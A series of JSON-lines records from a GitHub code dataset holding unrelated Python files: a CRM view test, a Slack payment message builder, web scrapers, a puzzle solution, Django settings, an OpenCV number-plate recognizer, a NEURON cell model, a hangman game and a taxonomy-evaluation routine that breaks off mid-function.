(\n Accomodation,\n AccomodationSearchForm,\n AccomodationsView,\n AccomodationForm,\n AccomodationAssignForm,\n)\n\n\nclass TestAccomodationsView(BaseViewTestCase):\n \n def test_index(self):\n AccomodationsView._get_title = lambda x: 'test'\n view = AccomodationsView(DummyResource(), DummyRequest())\n self.assertEqual({'title': 'test'}, view.index())\n\n @patch.object(AccomodationSearchForm, 'validate')\n @patch.object(AccomodationSearchForm, 'submit')\n @patch.object(\n AccomodationSearchForm, '_qb',\n return_value=MagicMock(\n get_count=lambda: 10, get_serialized=lambda: []\n )\n )\n def test_list(self, _qb, submit, validate):\n validate.return_value = True\n view = AccomodationsView(DummyResource(), DummyRequest())\n self.assertSetEqual({'total', 'rows'}, set(view.list().keys()))\n\n @patch.object(\n Accomodation, 'by_resource_id', return_value=Accomodation(id=1)\n )\n def test_view(self, by_resource_id):\n from pyramid.httpexceptions import HTTPFound\n AccomodationsView._get_title = lambda x, y=None: 'test'\n\n view = AccomodationsView(\n DummyResource(), DummyRequest(params=MultiDict({'rid': 1}))\n )\n self.assertIsInstance(view.view(), HTTPFound)\n\n AccomodationsView.edit = lambda x=None: {}\n view = AccomodationsView(DummyResource(), DummyRequest())\n self.assertSetEqual({'title', 'readonly'}, set(view.view().keys()))\n","repo_name":"mazvv/travelcrm","sub_path":"travelcrm/tests/views/test_accomodations.py","file_name":"test_accomodations.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"16"} +{"seq_id":"6623632731","text":"from app.models.slack.slack_base import SlackBase\n\n\nclass SlackPayment(SlackBase):\n\n\tdef __init__(self, user, payment, paypal):\n\t\tself.headers = 'Payment Notification'\n\t\tSlackBase.__init__(self)\n\t\tself.message = self.message + self.generate_message(user, payment, paypal)\n\n\n\tdef generate_message(self, user, payment, paypal):\t\t\n\t\tmessage = ''\n\t\tif paypal:\n\t\t\tmessage += 'Paypal transaction-id: ' + payment['transaction_id'] + '\\n'\n\t\tmessage += 'order-id: ' + payment['order_id'] + '\\n'\n\t\tmessage += 'username: ' + user.username + '\\n'\n\t\tmessage += 'Just completed his / her payment \\n'\n\t\treturn message","repo_name":"devsummit/backend","sub_path":"app/models/slack/slack_payment.py","file_name":"slack_payment.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"31301254453","text":"from .scraper import Scraper as default_scrpaer\r\n'''\r\n @post list\r\n method : GET\r\n url_0 = https://www.yw.go.kr/www/selectBbsNttList.do?key=26&bbsNo=16&pageUnit=10&searchCnd=all&pageIndex={}\r\n header :\r\n None\r\n'''\r\n'''\r\n @post info\r\n method : GET\r\n url : \r\n self.post_url + href\r\n header :\r\n None\r\n'''\r\nclass Scraper(default_scrpaer):\r\n def __init__(self, session):\r\n super().__init__(session)\r\n self.channel_name = '영월군청'\r\n self.post_board_name = '타기관소식'\r\n self.post_url = 'https://www.yw.go.kr/www'","repo_name":"choiseulong/chancewave_scraping","sub_path":"scrapingProject/workers/data_scraper/scraper_dormitory/rooms/gangwon/yw/scraper_1.py","file_name":"scraper_1.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41689843462","text":"#안전영역\nimport sys\nsys.setrecursionlimit(10 ** 5)\n\ndef dfs(i, j, k, n, heights, visited):\n visited[i][j] = True\n dirs = [(1, 0), (0, 1), (-1, 0), (0, -1)]\n for di, dj in dirs:\n if 0 <= i + di < n and 0 <= j + dj < n and not visited[i+di][j+dj] and heights[i+di][j+dj] > k:\n dfs(i + di, j + dj, k, n, heights, visited)\n\ndef solution(n, heights, highest):\n biggest = 1\n for k in range(1, highest):\n visited = [[False] * n for _ in range(n)]\n cnt = 0\n for i in range(n):\n for j in range(n):\n if not visited[i][j] and heights[i][j] > k:\n dfs(i, j, k, n, heights, visited)\n cnt += 1\n biggest = max(biggest, cnt)\n return biggest\n\nn = int(input())\nheights = []\nhighest = -float('inf')\nfor _ in range(n):\n height = list(map(int, input().split()))\n highest = max(max(height), highest)\n heights.append(height)\nprint(solution(n, heights, highest))","repo_name":"dldbdud314/PS","sub_path":"백준/2468.py","file_name":"2468.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5565464836","text":"# Parameters\n\nDEFAULT_AUTO_FIELD = 'django.db.models.AutoField'\n\n# -----------------------------------------------------------------\n# --------------------- Django REST Framework ---------------------\n# -----------------------------------------------------------------\n\nREST_FRAMEWORK = {\n # 'DEFAULT_RENDERER_CLASSES': (\n # 'rest_framework.renderers.JSONRenderer',\n # )\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'PAGE_SIZE': 5\n}\n\n# ---------------------------------------------------------\n# --------------------- Boards Params ---------------------\n# ---------------------------------------------------------\n\nMAX_SUBJECT_CHAR_COUNT = 255\n\nMAX_CHAR_COUNT = 20000\n\nMIN_THREADS = 1\n\nMAX_THREADS = 200\n\nMIN_POSTS = 500\n\nMAX_POSTS = 1000\n\nBOARD_THUMB_SIZE = (400, 400)\n\nPOST_THUMB_SIZE = (200, 200)\n\nMAX_UPLOAD_SIZE = 5242880\n\nALLOWED_EXTENSIONS = (\"jpg\", \"jpeg\", \"gif\", \"png\")\n\nTHUMBNAIL_ALIASES = {\n '': {\n 'avatar': {'size': (50, 50), 'crop': True},\n },\n}\n\nVERSATILEIMAGEFIELD_SETTINGS = {\n # The amount of time, in seconds, that references to created images\n # should be stored in the cache. Defaults to `2592000` (30 days)\n 'cache_length': 2592000,\n # The name of the cache you'd like `django-versatileimagefield` to use.\n # Defaults to 'versatileimagefield_cache'. If no cache exists with the name\n # provided, the 'default' cache will be used instead.\n 'cache_name': 'versatileimagefield_cache',\n # The save quality of modified JPEG images. More info here:\n # https://pillow.readthedocs.io/en/latest/handbook/image-file-formats.html#jpeg\n # Defaults to 70\n 'jpeg_resize_quality': 70,\n # The name of the top-level folder within storage classes to save all\n # sized images. Defaults to '__sized__'\n 'sized_directory_name': '__sized__',\n # The name of the directory to save all filtered images within.\n # Defaults to '__filtered__':\n 'filtered_directory_name': '__filtered__',\n # The name of the directory to save placeholder images within.\n # Defaults to '__placeholder__':\n 'placeholder_directory_name': '__placeholder__',\n # Whether or not to create new images on-the-fly. Set this to `False` for\n # speedy performance but don't forget to 'pre-warm' to ensure they're\n # created and available at the appropriate URL.\n 'create_images_on_demand': True,\n # A dot-notated python path string to a function that processes sized\n # image keys. Typically used to md5-ify the 'image key' portion of the\n # filename, giving each a uniform length.\n # `django-versatileimagefield` ships with two post processors:\n # 1. 'versatileimagefield.processors.md5' Returns a full length (32 char)\n # md5 hash of `image_key`.\n # 2. 'versatileimagefield.processors.md5_16' Returns the first 16 chars\n # of the 32 character md5 hash of `image_key`.\n # By default, image_keys are unprocessed. To write your own processor,\n # just define a function (that can be imported from your project's\n # python path) that takes a single argument, `image_key` and returns\n # a string.\n 'image_key_post_processor': None,\n # Whether to create progressive JPEGs. Read more about progressive JPEGs\n # here: https://optimus.io/support/progressive-jpeg/\n 'progressive_jpeg': False\n}\n\n\nVERSATILEIMAGEFIELD_RENDITION_KEY_SETS = {\n 'image_gallery': [\n ('gallery_large', 'crop__800x450'),\n ('gallery_square_small', 'crop__50x50')\n ],\n 'primary_image_detail': [\n ('hero', 'crop__600x283'),\n ('social', 'thumbnail__800x800')\n ],\n 'primary_image_list': [\n ('list', 'crop__400x225'),\n ],\n 'headshot': [\n ('headshot_small', 'crop__150x175'),\n ]\n}\n\n\n\n# ------------------------------------------------------\n# --------------------- ETH Params ---------------------\n# ------------------------------------------------------\n\nETH_ADDR_LEN = 40\n\nETH_HEX_ADDR_LEN = 42\n\nMAINNET_INFURA_HTTP = \"https://mainnet.infura.io/v3/\"\n\nMAINNET_INFURA_WS = \"wss://mainnet.infura.io/ws/v3/\"\n\nRINKEBY_WS = \"wss://rinkeby-light.eth.linkpool.io/ws\"\n\nOPENSEA_API_URL = \"https://api.opensea.io/api/v1/assets\"\n\nLIMIT_OPENSEA = \"30\" # default is 20, caps at 50\n\nALCHEMY_API_HTTP = \"https://eth-mainnet.alchemyapi.io/v2/\"\n\nALCHEMY_API_WS = \"wss://eth-mainnet.ws.alchemyapi.io/v2/\"","repo_name":"garyb9/shatter","sub_path":"backend/django_app/mainapp/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"16"} +{"seq_id":"5669400964","text":"import cv2\nimport numpy as np\n\nclass NumberPlateRecognizor:\n\n # Constants for the model and image processing\n __MODEL_SHAPE = (736, 736) # Model input shape (width, height)\n __BACKEND_ID = cv2.dnn.DNN_BACKEND_OPENCV\n __TARGET_ID = cv2.dnn.DNN_TARGET_CPU\n\n def __init__(self, textdetection_model_file, textrecognition_model_file):\n \"\"\"\n Initialize the NumberPlateRecognizor object.\n\n Args:\n textdetection_model_file (str): File path to the text detection model.\n textrecognition_model_file (str): File path to the text recognition model.\n\n Raises:\n FileNotFoundError: If any of the provided file paths do not exist.\n \"\"\"\n\n # Initialize member objects, e.g., load models or configure settings\n\n # Initialize the text detection model\n self.__detector_model = self.__initialize_textdetector_model(textdetection_model_file)\n\n # Initialize CRNN for text recognition\n self.__recognizer, self.__character_set, self.__character_size, self.__vertex_coordinates = self.__initialize_english_textrecognition_model(textrecognition_model_file)\n\n def __initialize_textdetector_model(self, model_path):\n # Constants for text detection parameters\n binary_threshold = 0.3\n polygon_threshold = 0.5\n max_candidates = 200\n unclip_ratio = 2.0\n\n # Create a text detection model\n model = cv2.dnn_TextDetectionModel_DB(cv2.dnn.readNet(model_path))\n\n model.setPreferableBackend(self.__BACKEND_ID)\n model.setPreferableTarget(self.__TARGET_ID)\n\n model.setBinaryThreshold(binary_threshold)\n model.setPolygonThreshold(polygon_threshold)\n model.setUnclipRatio(unclip_ratio)\n model.setMaxCandidates(max_candidates)\n\n model.setInputParams(1.0/255.0, self.__MODEL_SHAPE, (122.67891434, 116.66876762, 104.00698793))\n return model\n\n def __initialize_english_textrecognition_model(self, model_path):\n # Create a text recognition model\n model = cv2.dnn.readNet(model_path)\n model.setPreferableBackend(self.__BACKEND_ID)\n model.setPreferableTarget(self.__TARGET_ID)\n\n # Define character set and size\n character_set = '0123456789abcdefghijklmnopqrstuvwxyz'\n character_size = (100, 32) # This must not be changed and must be in sync with next line\n vertex_coordinates = np.array([\n [0, 31],\n [0, 0],\n [99, 0],\n [99, 31]\n ],\n dtype=np.float32)\n\n return model, character_set, character_size, vertex_coordinates\n\n def __recognize_text(self, image, boxshape):\n # Preprocess the image\n vertices = boxshape.reshape((4, 2)).astype(np.float32)\n rotationMatrix = cv2.getPerspectiveTransform(vertices, self.__vertex_coordinates)\n cropped_image = cv2.warpPerspective(image, rotationMatrix, self.__character_size)\n cropped_image = cv2.cvtColor(cropped_image, cv2.COLOR_BGR2GRAY)\n text_blob = cv2.dnn.blobFromImage(cropped_image, size=self.__character_size, mean=127.5, scalefactor=1 / 127.5)\n\n # Forward pass\n self.__recognizer.setInput(text_blob)\n output_blob = self.__recognizer.forward()\n\n # Postprocess the recognized text\n text = ''\n for i in range(output_blob.shape[0]):\n c = np.argmax(output_blob[i][0])\n if c != 0:\n text += self.__character_set[c - 1]\n else:\n text += '-'\n\n # Return processed text\n char_list = []\n for i in range(len(text)):\n if text[i] != '-' and (not (i > 0 and text[i] == text[i - 1])):\n char_list.append(text[i])\n\n return ''.join(char_list)\n\n def __visualize(self, image, boxes, texts):\n # Visualize the recognized text on the image\n color = (255, 255, 255)\n isClosed = True\n thickness = 2\n pts = np.array(boxes[0])\n output = cv2.polylines(image, pts, isClosed, color, thickness)\n for box, text in zip(boxes[0], texts):\n cv2.putText(output, text, (box[1].astype(np.int32)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255))\n return output\n\n def detect_numberplate(self, original_image):\n \"\"\"\n Detect number plates in an input image.\n\n Args:\n original_image (numpy.ndarray): An OpenCV image object.\n\n Returns:\n numpy.ndarray: An image with number plates marked.\n\n Raises:\n ValueError: If the provided image is not a valid numpy.ndarray.\n \"\"\"\n try:\n # Ensure the image is a valid numpy.ndarray\n if not isinstance(original_image, np.ndarray):\n raise ValueError(\"Input image is not a valid numpy.ndarray.\")\n\n # Get the original image dimensions\n original_h, original_w, _ = original_image.shape\n scaleHeight = original_h / self.__MODEL_SHAPE[1]\n scaleWidth = original_w / self.__MODEL_SHAPE[0]\n\n # Resize the image to the model's input shape\n image = cv2.resize(original_image, self.__MODEL_SHAPE)\n\n # Detect the locations of text in the resized image\n results = self.__detector_model.detect(image)\n\n # Recognize text in the detected locations\n texts = []\n for box, score in zip(results[0], results[1]):\n text = self.__recognize_text(image, box.reshape(8))\n texts.append(text)\n\n # Scale the results bounding box back to the original image dimensions\n for i in range(len(results[0])):\n for j in range(4):\n box = results[0][i][j]\n results[0][i][j][0] = box[0] * scaleWidth\n results[0][i][j][1] = box[1] * scaleHeight\n\n # Draw results on the original input image\n original_image = self.__visualize(original_image, results, texts)\n return original_image\n\n except Exception as e:\n print(f\"Error in detect_numberplate: {str(e)}\")\n","repo_name":"ngopikrishna/995","sub_path":"11/numberplate_recognizor.py","file_name":"numberplate_recognizor.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70061072007","text":"from requests_html import HTMLSession\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nr = HTMLSession()\ndata = []\nurl = \"https://www.booking.com/searchresults.html?aid=304142&label=gen173nr-1FCAEoggI46AdIM1gEaHaIAQGYATG4ARfIAQzYAQHoAQH4AQKIAgGoAgO4AsGR9JsGwAIB0gIkZWMxYzYxNjUtYjBlNy00MDllLWFhNzgtMWNmYjlhOGUwNDE32AIF4AIB&checkin=2022-11-25&checkout=2022-11-26&dest_id=-2258072&dest_type=city&group_adults=null&req_adults=null&no_rooms=null&group_children=null&req_children=null\"\n\n\ndef getpage(url):\n page = r.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n return soup\n\n\ndef getcontent(soup):\n items = soup.find_all(\"div\", {\"data-testid\": \"property-card\"})\n for item in items:\n name = item.find(\"div\", {\"data-testid\": \"title\"}).text\n price = item.find(\"span\", {\"class\": \"fcab3ed991 bd73d13072\"}).text\n link = item.find(\"a\")[\"href\"]\n size = item.find(\"span\", class_=\"df597226dd\").text\n spec = item.find(\"div\", class_=\"cb5b4b68a4\").text\n place = item.find(\"span\", class_=\"f4bd0794db b4273d69aa\").text\n distance = item.find(\"span\", {\"data-testid\": \"distance\"}).text\n info = {\n \"place name\": name,\n \"price\": price,\n \"Rooms\": size,\n \"interior\": spec,\n \"location\": place,\n \"distance from location\": distance,\n \"place link\": link,\n }\n data.append(info)\n return\n\n\nsoup = getpage(url)\ngetcontent(soup)\n\nfr = pd.DataFrame(data)\nfr.to_csv(\"booking.csv\",index=False)\n","repo_name":"john10279011/scraping-booking.com","sub_path":"bookings.py","file_name":"bookings.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70807493130","text":"import os\n\nfrom neuronpp.cells.cell import Cell\nfrom neuronpp.core.cells.core_hoc_cell import CoreHocCell\n\npath = os.path.dirname(os.path.abspath(__file__))\nf_path = os.path.join(path, \"..\", \"commons/hocmodels/combe2018\")\n\n\nclass Combe2018Cell(Cell, CoreHocCell):\n def __init__(self, name=None, model_folder=f_path, spine_number=0,\n spine_secs_names=\"apic\",\n spine_seed: int = None):\n \"\"\"\n :param name:\n The name of the cell\n :param model_folder:\n The folder where the main folder of Combe et al. 2018 model is located\n :param spine_number:\n The number of spines added to the model with random_uniform distribution to the sections\n specified by 'spine_sec' param.\n :param spine_secs_names:\n The section or sections where to put spines. It can be:\n * a string - as a filter name, so you can set \"apic\" to add spies to all apical\n dendrites\n\n * a regex, which need to be prefixed with 'regex:' string before\n eg. 'regex:(apic)|(basal)'\n will return all sections wich have a name containing 'apic' or 'basal' string\n\n * a list of existing sections in the cell\n :param spine_seed:\n Seed value for the random_uniform spike distribution. Default is None\n meaning - there is no seed\n \"\"\"\n Cell.__init__(self, name, model_folder)\n CoreHocCell.__init__(self, name)\n\n main_file = os.path.join(model_folder, \"load_cell.hoc\")\n self.load_hoc(main_file)\n\n secs = self.filter_secs(name=spine_secs_names)\n\n # Add spines with AMPA and NMDA synapses\n self.combe_syns = []\n if spine_number > 0:\n\n self.add_randuniform_spines(secs=secs, spine_number=spine_number, head_nseg=10,\n neck_nseg=10, seed=spine_seed)\n\n # Copy mechanisms from parent sec of the neck and from the nec to the head\n self.copy_mechanisms(secs_to=self.necks, sec_from='parent')\n self.copy_mechanisms(secs_to=self.heads, sec_from='parent')\n\n ampa_syns = []\n nmda_syns = []\n\n # Create AMPA synapses\n ampa_weight = 1.2 * 0.00156\n for h in self.heads:\n syn = self.add_synapse(source=None, seg=h(1.0), mod_name=\"Exp2Syn\",\n netcon_weight=ampa_weight)\n syn.point_process.hoc.e = 0\n syn.point_process.hoc.tau1 = .5\n syn.point_process.hoc.tau2 = 1.0\n ampa_syns.append(syn)\n\n # Create NMDA synapses\n nmda_weight = 1.2 * 0.000882\n for h in self.heads:\n syn = self.add_synapse(source=None, seg=h(1.0), mod_name=\"nmdanet\",\n netcon_weight=nmda_weight)\n syn.point_process.hoc.Alpha = 0.35\n syn.point_process.hoc.Beta = 0.035\n nmda_syns.append(syn)\n\n for syns in zip(ampa_syns, nmda_syns):\n comp_syn = self.group_synapses(synapses=syns, tag=\"combe_type\")\n self.combe_syns.append(comp_syn)\n","repo_name":"ziemowit-s/neuronpp","sub_path":"neuronpp/cells/combe2018_cell.py","file_name":"combe2018_cell.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"7410624611","text":"from fig import lista\nimport random\n\n\ndef enter_letter():\n while True:\n sth = input(\"Enter letter: \")\n if sth == \" \":\n print(\"You have to enter letter: \")\n elif sth.isdigit():\n print(\"Not a number. Letter!\")\n else:\n return sth\n\n\ndef draw_hangman(counter):\n print(lista[counter])\n\n\ndef choose_letter(word, list):\n hit = 0\n mistake = 0\n cout_draw = 0\n while True:\n try:\n if hit < len(word) and cout_draw < 11:\n letter = enter_letter()\n if letter in word:\n for x in range(len(word)):\n if word[x] == letter:\n hit = hit + 1\n list[x] = letter\n for x in list:\n print(x, end=\" \")\n print()\n else:\n mistake = mistake + 1\n draw_hangman(mistake)\n cout_draw = cout_draw + 1\n else:\n print(\"The end\")\n break\n except IndexError:\n print(\"Game over\")\n break\n\n\ndef main():\n words_list = [\"kot\", \"py\", \"haha\", \"ola\", \"asd\"]\n list = []\n word = random.choice(words_list)\n list.extend(word)\n\n for x in range(len(list)):\n list[x] = \"?\"\n\n for x in list:\n print(x, end=\" \")\n print()\n\n choose_letter(word, list)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dpiskosz/hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36885129460","text":"import torch \r\nimport torch.nn as nn \r\nimport torch.nn.functional as F \r\nfrom torch.nn.utils.rnn import pad_sequence, pack_padded_sequence, pad_packed_sequence \r\nimport numpy as np \r\nfrom tqdm import tqdm\r\nimport json\r\nimport scipy\r\nfrom scipy import stats\r\n\r\ndef random_choice(p, max_val= 50):\r\n candid = [x for x in range(len(p))]\r\n p = np.array(p) / np.sum(p)\r\n index = [np.random.choice(candid, p = p.ravel()) for _ in range(max_val)]\r\n val = [1 for _ in range(max_val)]\r\n return index, val\r\n\r\ndef getrank(a, idx=0):\r\n return len(a)-list(np.array(a).argsort()).index(idx)\r\n\r\ndef write_json(fp, data):\r\n with open(fp, 'w') as f:\r\n json.dump(data, f)\r\n\r\ndef testing(models, taxo_test, device, test_syn, test_hyn, dep_path, epoch, args, is_softmax = False, compound = False, synonym = True, innerpath= False):\r\n models.eval() \r\n y_true = []\r\n y_pred = []\r\n score_pred = {}\r\n rank = []\r\n correct = 0 \r\n total = 0\r\n score_save = {}\r\n for t in tqdm(test_hyn):\r\n score_t = {}\r\n score_tmp = []\r\n num_of_paths = {}\r\n test_node = int(t)\r\n attach_pos = int(test_hyn[t][\"attach\"])\r\n relation_type = test_hyn[t][\"type\"]\r\n for i in range(len(taxo_test)):\r\n target_path = taxo_test.taxo[i][\"path\"]\r\n inner_path = taxo_test.inner_paths[i]\r\n train_path = taxo_test.train_path[test_node][i]\r\n pos_term = taxo_test.pos_term[i]\r\n\r\n if innerpath:\r\n inner = []\r\n freq = []\r\n for z in inner_path:\r\n inner.extend(dep_path[z[0]][\"path\"])\r\n freq.extend(dep_path[z[0]][\"freq\"])\r\n if len(inner) > 100:\r\n sample_idx, sample_freq = random_choice(freq, max_val= 100)\r\n inner = [inner[x] for x in sample_idx]\r\n freq = sample_freq\r\n else:\r\n inner = []\r\n freq = []\r\n dependency_paths = []\r\n dependency_freq = []\r\n for y in train_path:\r\n\r\n if y == None:\r\n dependency_paths.append([])\r\n dependency_freq.append([])\r\n elif len(dep_path[y[0]][\"path\"]) > 100: # sample 50 paths if there is too much dependency path\r\n sample_idx, sample_freq = random_choice(dep_path[y[0]][\"freq\"], max_val= 100)\r\n #print(dep_path[xx][\"path\"], dep_path[xx][\"freq\"], sample_idx, sample_freq)\r\n dependency_paths.append([dep_path[y[0]][\"path\"][x] for x in sample_idx])\r\n dependency_freq.append(sample_freq)\r\n else:\r\n dependency_paths.append(dep_path[y[0]][\"path\"])\r\n dependency_freq.append(dep_path[y[0]][\"freq\"])\r\n score, embed_preds, paths_preds, taxi_preds = models(target_path = target_path, inner_path = inner, inner_freq = freq, attach = test_node, \\\r\n attach_path = dependency_paths, attach_freq = dependency_freq, device = device, compound = compound)\r\n \r\n if is_softmax:\r\n #print(score)\r\n score = F.softmax(score, dim = 1)\r\n #print(score)\r\n score = score.detach().cpu().numpy().reshape(-1)\r\n #print(score)\r\n score_tmp.append({str(int(x)): '%.3f'%y for (x,y) in zip(pos_term, score)})\r\n #print(score.shape[0], len(pos_term))\r\n for e,s in zip(pos_term, score):\r\n if e not in score_t:\r\n score_t[e] = [s]\r\n else:\r\n score_t[e].append(s)\r\n l = len(score_t)\r\n score_save[t] = score_tmp\r\n if attach_pos in score_t:\r\n ranklst = [ np.mean(score_t[attach_pos]) ]\r\n for r in score_t:\r\n if r != attach_pos:\r\n ranklst.append( np.mean(score_t[r]) )\r\n rank_ = getrank(ranklst, idx = 0)\r\n if rank_ == 1:\r\n correct += 1\r\n total += 1\r\n rank.append(rank_)\r\n score_pred[t] = score_t\r\n\r\n write_json('../log_result/%s_%s_%d_score.json'%(args.encode_dep, args.encode_prop, epoch), score_save)\r\n if synonym:\r\n pass\r\n print('\\n=> Testing: Mean Rank:%.2f/%d, Acc = %.3f'%(np.mean(rank), l, float(correct/total)))\r\n \r\ndef testing_f1(models, taxo_test, device, test_syn, test_hyn, dep_path, epoch, args, inv_paths_index, metric= 'mean', is_softmax = False, compound = False, synonym = True, innerpath= False):\r\n models.eval() \r\n wum = np.loadtxt('%s/wum.txt'%(args.fp))\r\n y_true = []\r\n y_pred = []\r\n score_pred = {} # score all score for nodes [format: attach_term:{all score dict} ]\r\n score_one = {} # score all score for nodes [format: attach_term:{overall score with the attach node} ]\r\n score_best = {} # [format: attach_term:{best score with the attach node} ]\r\n score_save_dict = {}\r\n attach_term_list = [] # attached node in test set in the taxo\r\n to_attached_number = len(test_hyn)\r\n rank = []\r\n wup = []\r\n correct = 0 \r\n total = 0\r\n total_rank = 0\r\n score_save = {}\r\n rank_save = {}\r\n path_save = {}\r\n score_test_save = {}\r\n target_paths = [taxo_test.taxo[i][\"path\"] for i in range(len(taxo_test))]\r\n inner_paths = [taxo_test.inner_paths[i] for i in range(len(taxo_test))]\r\n train_paths = {int(x):taxo_test.train_path[int(x)] for x in test_hyn}\r\n pos_terms = [taxo_test.pos_term[i] for i in range(len(taxo_test))]\r\n num_of_paths={}\r\n\r\n attach_pos_gold = {int(t):int(test_hyn[t][\"attach\"]) for t in test_hyn}\r\n for t in tqdm(test_hyn):\r\n score_t = {} # all score\r\n one_score = {} #one score(do average)\r\n score_tmp = []\r\n test_node = int(t)\r\n num_paths = {}\r\n attach_pos = int(test_hyn[t][\"attach\"])\r\n relation_type = test_hyn[t][\"type\"]\r\n for i in range(len(taxo_test)):\r\n target_path = taxo_test.taxo[i][\"path\"]\r\n inner_path = taxo_test.inner_paths[i]\r\n train_path = taxo_test.train_path[test_node][i]\r\n pos_term = taxo_test.pos_term[i]\r\n #print(target_path, inner_path, pos_term)\r\n\r\n if innerpath:\r\n inner = []\r\n freq = []\r\n for z in inner_path:\r\n inner.extend(dep_path[z[0]][\"path\"])\r\n freq.extend(dep_path[z[0]][\"freq\"])\r\n #print(inner,freq)\r\n if len(inner) > 100:\r\n sample_idx, sample_freq = random_choice(freq, max_val= 100)\r\n inner = [inner[x] for x in sample_idx]\r\n freq = sample_freq\r\n else:\r\n inner = []\r\n freq = []\r\n dependency_paths = []\r\n dependency_freq = []\r\n for i, y in enumerate(train_path):\r\n num_paths[target_path[i][0]] = len(dep_path[y[0]][\"path\"]) if y!=None else 0\r\n if y == None:\r\n dependency_paths.append([])\r\n dependency_freq.append([])\r\n elif len(dep_path[y[0]][\"path\"])>100: # sample 50 paths if there is too much dependency path\r\n sample_idx, sample_freq = random_choice(dep_path[y[0]][\"freq\"], max_val= 100)\r\n #print(dep_path[xx][\"path\"], dep_path[xx][\"freq\"], sample_idx, sample_freq)\r\n dependency_paths.append([dep_path[y[0]][\"path\"][x] for x in sample_idx])\r\n dependency_freq.append(sample_freq)\r\n else:\r\n dependency_paths.append(dep_path[y[0]][\"path\"])\r\n dependency_freq.append(dep_path[y[0]][\"freq\"])\r\n score, embed_preds, paths_preds, taxi_preds = models(target_path = target_path, inner_path = inner, inner_freq = freq, attach = test_node, \\\r\n attach_path = dependency_paths, attach_freq = dependency_freq, device = device, compound = compound)\r\n if is_softmax:\r\n score = F.softmax(score, dim = 1)\r\n score = score.detach().cpu().numpy().reshape(-1)\r\n embed_preds, paths_preds, taxi_preds = embed_preds.detach().cpu().numpy().reshape(-1),paths_preds.detach().cpu().numpy().reshape(-1),taxi_preds.detach().cpu().numpy().reshape(-1)\r\n\t\t\t\r\n score_tmp.append({str(int(x)): 'o:%.3f,emb:%.3f,dep:%.3f,taxi:%.3f'%(y, y1, y2, y3) for (x, y, y1, y2, y3) in zip(pos_term, score, embed_preds, paths_preds, taxi_preds)})\r\n '''\r\n we calculate the score of all terms for term t here (e is the term in train taxo)\r\n '''\r\n for e,s in zip(pos_term, score):\r\n if e not in score_t:\r\n score_t[e] = [s]\r\n else:\r\n score_t[e].append(s)\r\n l = len(score_t)\r\n #optim_pos = 0\r\n if attach_pos in score_t:\r\n ranklst = [ scipy.stats.gmean(score_t[attach_pos]) if is_softmax else np.mean(score_t[attach_pos]) ]\r\n optim_pos = attach_pos\r\n maxval = ranklst[0]\r\n #print('##########', num_paths[attach_pos], '#########')\r\n for r in score_t:\r\n if r != attach_pos:\r\n ranklst.append( scipy.stats.gmean(score_t[r]) if is_softmax else np.mean(score_t[r]) )\r\n if ranklst[-1] > maxval:\r\n optim_pos = r\r\n maxval = ranklst[-1]\r\n if optim_pos == attach_pos:\r\n wup.append(1)\r\n else:\r\n wup.append(wum[optim_pos, attach_pos])\r\n\r\n rank_ = getrank(ranklst, idx = 0)\r\n if rank_ == 1:\r\n\r\n correct += 1\r\n total_rank += 1\r\n rank.append(rank_)\r\n score_save[t] = score_tmp#\r\n score_test_save[t] = np.float(np.mean(score_t[attach_pos]))\r\n rank_save[t] = rank_\r\n path_save[t] = num_paths[attach_pos]\r\n\r\n score_pred[t] = score_t\r\n num_of_paths[test_node] = num_paths\r\n '''\r\n For all nodes, we calculate the mean score and get the highest score with the corresponding location\r\n '''\r\n for r in score_t:\r\n if metric =='mean':\r\n one_score[r] = np.float(scipy.stats.gmean(score_t[r])) if is_softmax else np.float(np.mean(score_t[r]))\r\n else:\r\n one_score[r] = np.max(score_t[r])\r\n '''\r\n Get maximum score for all nodes, decide the place to insert the node\r\n '''\r\n best_val, best_attach = get_max_from_dict(one_score) # attach: is the node in original taxo\r\n score_one[t] = one_score\r\n score_best[t] = {'best_val': best_val, 'attach': best_attach} # t: term in test set\r\n acc3 = getacc(rank, 3)\r\n acc5 = getacc(rank, 5)\r\n mrr = np.mean([1/x for x in rank])\r\n wup_score = np.mean(wup)\r\n if 'science_wordnet' in args.model_name:\r\n dataset = 'science_wordnet_en'\r\n elif 'env' in args.model_name and 'eurovoc' in args.model_name:\r\n dataset = 'environment_eurovoc_en'\r\n elif 'food_wordnet' in args.model_name:\r\n dataset = 'food_wordnet_en'\r\n else:\r\n dataset = 'unknown'\r\n if args.encode_prop in ['linear', 'none'] and epoch>1 and args.layers == 2:\r\n np.savetxt('../log_result/param_layer1_%d_%s.txt'%(epoch, args.model_name), models.gc2.mlp.dense0.weight.detach().cpu().numpy(), fmt = '%.5f')\r\n np.savetxt('../log_result/param_layer2_%d_%s.txt'%(epoch, args.model_name), models.gc2.mlp.dense1.weight.detach().cpu().numpy(), fmt = '%.5f')\r\n if epoch >= 0:\r\n 